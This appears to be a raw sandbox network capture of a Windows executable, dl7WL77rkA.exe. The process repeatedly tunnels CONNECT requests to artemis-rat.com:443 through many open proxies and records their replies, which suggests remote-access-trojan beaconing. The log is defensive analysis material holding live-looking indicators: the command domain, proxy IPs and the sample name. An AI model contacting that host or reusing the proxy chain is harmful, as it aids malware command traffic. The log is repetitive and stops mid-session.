Mar 11, 2024 03:30:42.541733980 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.389265060 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.405596018 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.405667067 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.405266047 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:58.910657883 CET | 19 | IN | HTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1173192.168.2.553157170.64.222.14180003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.555176973 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.874773979 CET | 32 | IN | HTTP/1.0 504 Gateway Timeout


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1174192.168.2.55319946.182.6.69361123876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.555771112 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1175192.168.2.55324813.208.168.17931283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.555773973 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.824778080 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:42 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1176192.168.2.553132210.72.11.4680803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.556129932 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.936203957 CET | 39 | IN | HTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1177192.168.2.553201196.20.125.12980833876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.556699038 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1178192.168.2.553136148.72.209.17429063876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.564893007 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.355210066 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.446161032 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.514698029 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.723165035 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.905190945 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:59.108283997 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1179192.168.2.552326120.194.4.157823876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.568173885 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.701942921 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.661421061 CET  319  IN  HTTP/1.1 400 Bad Request
Server: openresty
Date: Mon, 11 Mar 2024 02:30:46 GMT
Content-Type: text/html
Content-Length: 170
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
Mar 11, 2024 03:30:49.664738894 CET  319  IN  HTTP/1.1 400 Bad Request
Server: openresty
Date: Mon, 11 Mar 2024 02:30:46 GMT
Content-Type: text/html
Content-Length: 170
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
Mar 11, 2024 03:30:55.672926903 CET  319  IN  HTTP/1.1 400 Bad Request
Server: openresty
Date: Mon, 11 Mar 2024 02:30:46 GMT
Content-Type: text/html
Content-Length: 170
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
Mar 11, 2024 03:31:07.689439058 CET  319  IN  HTTP/1.1 400 Bad Request
Server: openresty
Date: Mon, 11 Mar 2024 02:30:46 GMT
Content-Type: text/html
Content-Length: 170
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
Mar 11, 2024 03:31:31.789619923 CET  319  IN  HTTP/1.1 400 Bad Request
Server: openresty
Date: Mon, 11 Mar 2024 02:30:46 GMT
Content-Type: text/html
Content-Length: 170
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
Mar 11, 2024 03:32:19.883738041 CET  319  IN  HTTP/1.1 400 Bad Request
Server: openresty
Date: Mon, 11 Mar 2024 02:30:46 GMT
Content-Type: text/html
Content-Length: 170
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1180192.168.2.553325172.67.181.103803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.569870949 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.724399090 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1181192.168.2.55314739.108.227.108803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.570430994 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.904612064 CET | 767 | IN | HTTP/1.1 403 Forbidden
Server: Beaver
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 635
Connection: close
Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1182192.168.2.553149114.132.202.12580803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.573857069 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.108999968 CET | 84 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:42 GMT
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1183192.168.2.553332172.67.255.224803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.581270933 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.735474110 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1184192.168.2.551327103.200.135.22841453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.581273079 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1185192.168.2.553207219.73.88.167803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.582325935 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.896959066 CET | 340 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.12.2
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 173
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1186192.168.2.552634162.214.170.144253473876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.582688093 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.701931953 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.702167034 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.702297926 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1187192.168.2.551514162.214.191.209582753876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.583041906 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.701976061 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.702183962 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.702297926 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1188192.168.2.55322694.130.94.45803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.585061073 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.893260956 CET | 303 | IN | HTTP/1.1 400 Bad Request
Server: openresty
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1189192.168.2.553109115.248.66.13131293876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.591588974 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.291887045 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1190192.168.2.553305162.241.79.22520483876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.595506907 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.201685905 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.905181885 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.202058077 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.702094078 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1191192.168.2.553351185.162.229.70803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.599678993 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.754149914 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1192192.168.2.553213181.12.80.21120003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.599972010 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1193192.168.2.553135103.49.202.252803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.600147009 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.978923082 CET | 343 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 182
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1194192.168.2.55325638.7.204.1299993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.603795052 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.355046988 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.311471939 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.124826908 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.811407089 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.514434099 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:57.217190981 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:58.556723118 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1195192.168.2.552711162.241.45.22505283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.603802919 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.701980114 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.702183008 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.702301979 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1196192.168.2.553315154.205.152.9631283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.604193926 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.816945076 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1197192.168.2.551493162.214.170.144535483876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.604468107 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.608216047 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
